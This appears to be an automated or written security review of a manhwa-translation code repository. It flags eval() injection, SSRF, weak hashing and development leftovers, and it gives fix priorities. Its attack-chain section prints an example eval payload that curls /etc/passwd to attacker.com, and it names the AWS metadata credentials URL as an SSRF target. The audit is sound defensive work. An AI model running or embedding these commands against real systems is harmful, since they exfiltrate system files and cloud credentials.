# SECURITY REVIEW: AFutureProgrammer/manhwaLocaliser
REAL THREATS
CODE INJECTION (CRITICAL - IMMEDIATE FIX REQUIRED)
[7] memory/models.py:111 - Use of eval()
[8] memory/promotion.py:23 - Use of eval()These are
REMOTE CODE EXECUTION vulnerabilities.
eval() executes arbitrary Python code. If any user input reaches these calls, an attacker gains full system access. They can:
• Steal all data on the server
• Install malware/ransomware
• Pivot to other systems on your network
• Use your server for crypto mining or bot attacks
Even if you think the input is "trusted," this is a critical flaw. Trust boundaries break.
FIX IMMEDIATELY.SERVER-SIDE REQUEST FORGERY (HIGH - EXPLOITATION LIKELY)
[48] backend/core/sources/naver.py:107 - User-controlled URL in HTTP requestSSRF lets attackers make your server request arbitrary URLs. They can:
• Scan your internal network (AWS metadata endpoints, internal services)
• Bypass firewalls to access internal resources
• Exfiltrate credentials from cloud metadata (AWS keys, etc.)
• Use your server as a proxy for attacks
This is especially dangerous in cloud environments where metadata endpoints expose credentials.
WEAK CRYPTOGRAPHY (MEDIUM - DATA EXPOSURE RISK)
[165] backend/engine.py:880 - MD5/SHA1 hash algorithmIf this is used for:
• Password hashing: CRITICAL - passwords can be cracked in hours
• Data integrity: HIGH - collisions can be forged
• Non-security (checksums): LOW - acceptable
MD5/SHA1 are cryptographically broken. For security contexts, use bcrypt/argon2 (passwords) or SHA-256+ (integrity).
DEVELOPMENT ARTIFACTS IN PRODUCTION (MEDIUM)
[62] backend/core/translation.py:169 - System Wildcard DetectedWildcard imports (
from module import *) can expose dangerous functions or create naming collisions that lead to security bugs. Not directly exploitable but increases attack surface.
Multiple localhost/HTTP findings: These suggest development code in production. If localhost URLs fail over to attacker-controlled alternatives or HTTP is used where HTTPS should be, data leaks occur.
ATTACK CHAINS
Chain 1: SSRF → Internal Credential Theft
• [48] SSRF vulnerability allows requesting internal URLs
• Attacker requests http://169.254.169.254/latest/meta-data/iam/security-credentials/ (AWS)
• Attacker obtains AWS credentials
• Full AWS account compromise
Chain 2: Code Injection → Data Exfiltration
• [7] or [8] eval() vulnerability exploited
• Attacker executes: eval("__import__('os').system('curl attacker.com/exfil?data=$(cat /etc/passwd)')")
• All server data exfiltrated
• Persistent backdoor installed
VERDICT
NOT SAFE TO DEPLOY IN CURRENT STATE.The two
eval() calls are
show-stoppers. These are textbook RCE vulnerabilities that will be found and exploited. This isn't theoretical—automated scanners actively hunt for these patterns.
Must Fix Before ANY Deployment:
1. [7, 8] Remove all eval() calls. Use ast.literal_eval() for safe literal parsing, or JSON/YAML parsers. If you need dynamic code, use sandboxed execution or plugin architectures.
2. [48] Implement URL allowlisting for the SSRF vulnerability. Never trust user input in HTTP requests.
Fix Within 48 Hours of Deployment:
3. [165] Replace MD5/SHA1 with modern algorithms. Audit what it's securing.
Technical Debt (Fix Next Sprint):
4. Remove localhost URLs and ensure HTTPS everywhere
5. Eliminate wildcard imports
6. Clean up development artifacts
False Positive Notes:
• 140+ "Changed Semgrepignore" findings are scanner noise
• "Weak or deprecated cipher" in markdown/JSON files are likely false positives (documentation containing the words, not actual crypto)
• "Use Escapexml" in TSX files are likely React false positives (React auto-escapes)
• "Insecure Http Request" in docs/configs may be examples, not live code
Bottom Line: Two critical RCE vulnerabilities make this a hacker's paradise. Fix the
eval() calls and SSRF, or don't deploy. Everything else is secondary.